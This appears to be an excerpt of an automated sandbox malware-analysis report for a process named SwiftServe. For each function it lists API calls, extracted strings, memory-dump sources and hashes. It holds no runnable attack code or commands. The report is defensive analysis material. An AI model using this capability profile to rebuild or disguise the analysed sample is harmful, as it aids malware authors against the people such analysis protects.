Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00E7B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E79BCC
GetDlgCtrlID.USER32 ref: 00E79BD7
GetParent.USER32 ref: 00E79BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E79BF6
GetDlgCtrlID.USER32(?), ref: 00E79BFF
GetParent.USER32(?), ref: 00E79C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00E79C1E

Strings

ListBox, xrefs: 00E79B89
ComboBox, xrefs: 00E79B54

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 46508f9a1f1fd794c5b335e867a2414afdb037168022e0ea537d0533a420c2c7
Instruction ID: 3ec51d75da53fdf5721859c73ca16f01221e8a8ab077fab9aed1f957c9bab819
Opcode Fuzzy Hash: 46508f9a1f1fd794c5b335e867a2414afdb037168022e0ea537d0533a420c2c7
Instruction Fuzzy Hash: CD21C170900204AFCF05EB61CC89EFEBBB5EF95310F105256F961B3296DB745919DA20

Function 00E79C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00E7B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E79CB5
GetDlgCtrlID.USER32 ref: 00E79CC0
GetParent.USER32 ref: 00E79CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E79CDF
GetDlgCtrlID.USER32(?), ref: 00E79CE8
GetParent.USER32(?), ref: 00E79D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00E79D07

Strings

ListBox, xrefs: 00E79C74
ComboBox, xrefs: 00E79C3F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a50ccb5f8eb3a2ff016b8739ede1f368a19ac6256975a598271f4336a92fb1fc
Instruction ID: 49da4e62b77906c868c884e7de068f0e6e5304edfa3c8e0cb2059f982704885c
Opcode Fuzzy Hash: a50ccb5f8eb3a2ff016b8739ede1f368a19ac6256975a598271f4336a92fb1fc
Instruction Fuzzy Hash: AE210071A40204BFCF15EBA1CC85EFEBBB8EF84300F105216F951B7292DB749929DA20

Function 00E79D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00E79D27
GetClassNameW.USER32(00000000,?,00000100), ref: 00E79D3C
_wcscmp.LIBCMT ref: 00E79D4E
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E79DC9

Strings

SHELLDLL_DefView, xrefs: 00E79D48
list, xrefs: 00E79DAB
smallicons, xrefs: 00E79D91
largeicons, xrefs: 00E79D5D
details, xrefs: 00E79D77

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ee935e6b041ebec943a9246448a956a31a5d4584b06fb97e1350e36a40a82a53
Instruction ID: 61d39a0a06ab26790ff929616bb8c2d131052b88ed4e4f61fc607ff1e7464db3
Opcode Fuzzy Hash: ee935e6b041ebec943a9246448a956a31a5d4584b06fb97e1350e36a40a82a53
Instruction Fuzzy Hash: 9E110276248312BEFA212620FC06DE7739CDF05324F206127FB18B51E2FEA66A125A51

Function 00E98F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E98FC1
CoInitialize.OLE32(00000000), ref: 00E98FEE
CoUninitialize.OLE32 ref: 00E98FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00E990F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00E99225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00EB3BDC), ref: 00E99259
CoGetObject.OLE32(?,00000000,00EB3BDC,?), ref: 00E9927C
SetErrorMode.KERNEL32(00000000), ref: 00E9928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E9930F
VariantClear.OLEAUT32(?), ref: 00E9931F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 7927b69a5c9e18178a4b994a4ecaafbd442692e1e98581e02e9bbb96dcb0e054
Instruction ID: 30916e1c89c95e27d9ed9aa933947caeeec1700ee7ab89e6b3a1b575cc9cea7f
Opcode Fuzzy Hash: 7927b69a5c9e18178a4b994a4ecaafbd442692e1e98581e02e9bbb96dcb0e054
Instruction Fuzzy Hash: 94C14771208305AFDB04DF69C88496BB7E9FF89348F00591CF58AAB262DB71ED05CB52

Function 00E819CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E819EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E80A67,?,00000001), ref: 00E81A03
GetWindowThreadProcessId.USER32(00000000), ref: 00E81A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E80A67,?,00000001), ref: 00E81A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E81A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E80A67,?,00000001), ref: 00E81A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E80A67,?,00000001), ref: 00E81A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E80A67,?,00000001), ref: 00E81A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E80A67,?,00000001), ref: 00E81AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E80A67,?,00000001), ref: 00E81ABB

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 89306815955056d8b326573a480446b9c09794976493f9c5f7441e660cd82ed9
Instruction ID: 7236800e07abec8471e4ca8b65e97df04af6656dc6355cd9990ea4d29ed590ef
Opcode Fuzzy Hash: 89306815955056d8b326573a480446b9c09794976493f9c5f7441e660cd82ed9
Instruction Fuzzy Hash: F731017160124CAFDB14EF92DE84FAA37AEEB54349F104285F80CFA190CBB0AC49CB10

Function 00E5C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E2260D
SetTextColor.GDI32(?,000000FF), ref: 00E22617
SetBkMode.GDI32(?,00000001), ref: 00E2262C
GetStockObject.GDI32(00000005), ref: 00E22634
GetClientRect.USER32(?), ref: 00E5C0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00E5C113
GetWindowDC.USER32(?), ref: 00E5C11F
GetPixel.GDI32(00000000,?,?), ref: 00E5C12E
ReleaseDC.USER32(?,00000000), ref: 00E5C140
GetSysColor.USER32(00000005), ref: 00E5C15E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 3930cda14e4e9357bf7ae785bb12549848e49a2a1ef80a18e5ba4192a25f296d
Instruction ID: 7d9cf61aa6cd4b64aee35758e3ef80d9003fc005db6fcc807ce0b0e93f187105
Opcode Fuzzy Hash: 3930cda14e4e9357bf7ae785bb12549848e49a2a1ef80a18e5ba4192a25f296d
Instruction Fuzzy Hash: 09117C31501205BFDB615FA5EC48BEB7BB1EB08322F204365FA65B50E1CB312959EF11

Function 00E7AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00E7B13A), ref: 00E7B078

Strings

INSTANCE, xrefs: 00E7AF86
REGEXPCLASS, xrefs: 00E7AE3D
NAME, xrefs: 00E7AEAA
CLASSNN, xrefs: 00E7AE1A
TEXT, xrefs: 00E7AFAF
CLASS, xrefs: 00E7ADF7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: c6c6e9db9a4e29d12481aa44085311d80f955af331ca8783f89973aa602001fc
Instruction ID: d4b768db6a1390c71cc711391ba708559c5895a0b3faaa22bed7a73bce197803
Opcode Fuzzy Hash: c6c6e9db9a4e29d12481aa44085311d80f955af331ca8783f89973aa602001fc
Instruction Fuzzy Hash: 0F916170A00106DACB18DF60C445BEEFBB5BF44304F58E12AE96EB7251DF306959D791

Function 00E231F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00E2327E

Part of subcall function 00E2218F: GetClientRect.USER32(?,?), ref: 00E221B8
Part of subcall function 00E2218F: GetWindowRect.USER32(?,?), ref: 00E221F9
Part of subcall function 00E2218F: ScreenToClient.USER32(?,?), ref: 00E22221

GetDC.USER32 ref: 00E5D073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E5D086
SelectObject.GDI32(00000000,00000000), ref: 00E5D094
SelectObject.GDI32(00000000,00000000), ref: 00E5D0A9
ReleaseDC.USER32(?,00000000), ref: 00E5D0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E5D13C

Strings

U, xrefs: 00E5D011

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2069d9e2172abb59eff13475a64e82a4833325dffab012490de32ca5ff395d58
Instruction ID: 33c012a9d3e514147e6edf90cdf3b8ad532b6d7c69b40cbb86606043397cb1ac
Opcode Fuzzy Hash: 2069d9e2172abb59eff13475a64e82a4833325dffab012490de32ca5ff395d58
Instruction Fuzzy Hash: C1712131408209DFCF318F64CC80AEA7BB6FF49326F146669ED557A1A5C7318849DF60

Function 00EAC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

Part of subcall function 00E22714: GetCursorPos.USER32(?), ref: 00E22727
Part of subcall function 00E22714: ScreenToClient.USER32(00EE77B0,?), ref: 00E22744
Part of subcall function 00E22714: GetAsyncKeyState.USER32(00000001), ref: 00E22769
Part of subcall function 00E22714: GetAsyncKeyState.USER32(00000002), ref: 00E22777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EAC69C
ImageList_EndDrag.COMCTL32 ref: 00EAC6A2
ReleaseCapture.USER32 ref: 00EAC6A8
SetWindowTextW.USER32(?,00000000), ref: 00EAC752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EAC765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EAC847

Strings

@GUI_DRAGFILE, xrefs: 00EAC7DC
@GUI_DROPID, xrefs: 00EAC799

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 757e05347eb3ff0f9cf526f13051711cb124136a899164d41b3c693e68d21e6f
Instruction ID: e20176c5a2a2ac80e691fff3e5a8ff2de1e9021a4deeaec7ca793567894b2b43
Opcode Fuzzy Hash: 757e05347eb3ff0f9cf526f13051711cb124136a899164d41b3c693e68d21e6f
Instruction Fuzzy Hash: 4051AC70108344AFD714EF21DC4AF6B7BE1EB88310F10591DF595AB2E1CB30A949CB51

Function 00E920E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E9211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E92148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E9218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E9219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E921AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E921DC
InternetCloseHandle.WININET(00000000), ref: 00E92223

Part of subcall function 00E92B4F: GetLastError.KERNEL32(?,?,00E91EE3,00000000,00000000,00000001), ref: 00E92B64
Part of subcall function 00E92B4F: SetEvent.KERNEL32(?,?,00E91EE3,00000000,00000000,00000001), ref: 00E92B79

Strings

, xrefs: 00E921CD

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: f9419a6b89ab578cd6973305210c0a59757fd32aeac84bab04b542945be85c0f
Instruction ID: 97408c39c49927ff4d8566e9b3f30aab61eed7c2178e8da41f031f8050e14529
Opcode Fuzzy Hash: f9419a6b89ab578cd6973305210c0a59757fd32aeac84bab04b542945be85c0f
Instruction Fuzzy Hash: C1416DB1541218BFEF129F51CC89FFB7BACEF08354F00511AFA05AA151DB70AE549BA0

Function 00E99330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EB0980), ref: 00E99412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EB0980), ref: 00E99446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E995C0
SysFreeString.OLEAUT32(?), ref: 00E995EA

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e4ed5a394e71672c85a6f2d160b202167b046811a31c03ce0b8af09e815ebf0f
Instruction ID: 6ace34c8628449f59d828cdcb2f1d5217c30feec10d8a172fc4ede4bf72ddbaf
Opcode Fuzzy Hash: e4ed5a394e71672c85a6f2d160b202167b046811a31c03ce0b8af09e815ebf0f
Instruction Fuzzy Hash: 99F13B71A00209EFDF04DFA8C884EAEB7B9FF45315F109059F916AB252DB31AE45CB60

Function 00E9FD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9FD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EA0133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EA0165
CloseHandle.KERNEL32(?), ref: 00EA0194
CloseHandle.KERNEL32(?), ref: 00EA020B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 929c6943754843dcb4f7c32efa7cb7142965934d9640b0e1fe79c2f135f0121c
Instruction ID: a6f445b14101642a9875a5eafe5952106e93f9eb842a3d1811aafbd0f691bcd3
Opcode Fuzzy Hash: 929c6943754843dcb4f7c32efa7cb7142965934d9640b0e1fe79c2f135f0121c
Instruction Fuzzy Hash: F1E1B2312043019FCB15EF24D895B6BBBE1EF85314F14996DF489AB2A2CB31EC45CB52

Function 00E8527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E84BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E83B8A,?), ref: 00E84BE0

Part of subcall function 00E84BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E83B8A,?), ref: 00E84BF9

Part of subcall function 00E84FEC: GetFileAttributesW.KERNEL32(?,00E83BFE), ref: 00E84FED

lstrcmpiW.KERNEL32(?,?), ref: 00E852FB
_wcscmp.LIBCMT ref: 00E85315
MoveFileW.KERNEL32(?,?), ref: 00E85330

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 396e1c49c2eac17356ccb186b009639de3eaf669fd9c483e9869d3c8daf06820
Instruction ID: 7a976e0a53872f1a21db25e8276aa48f59de8cb45a8478594466717be8ee7052
Opcode Fuzzy Hash: 396e1c49c2eac17356ccb186b009639de3eaf669fd9c483e9869d3c8daf06820
Instruction Fuzzy Hash: A25195B20087859BC764EBA0D8819DFB7EC9F84301F50591EF28DE3152EF35A688C766

Function 00EA8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EA8D24

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d223b699482103b29da77766d96ae6d839ea7aaee80862e667ab399a8863740f
Instruction ID: b7f49d643662d31d14992ca3e623949bc18c0f56bfeb61e7e36b7379340455e6
Opcode Fuzzy Hash: d223b699482103b29da77766d96ae6d839ea7aaee80862e667ab399a8863740f
Instruction Fuzzy Hash: 8D51D130640214FFEF249F29CE89B9A7BA4AB0A324F246516F615FE1E1CF71BD50CA51

Function 00E22F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E5C638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E5C65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E5C672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E5C690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E5C6B1
DestroyIcon.USER32(00000000), ref: 00E5C6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E5C6DD
DestroyIcon.USER32(?), ref: 00E5C6EC

Part of subcall function 00EAAAD4: DeleteObject.GDI32(00000000), ref: 00EAAB0D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

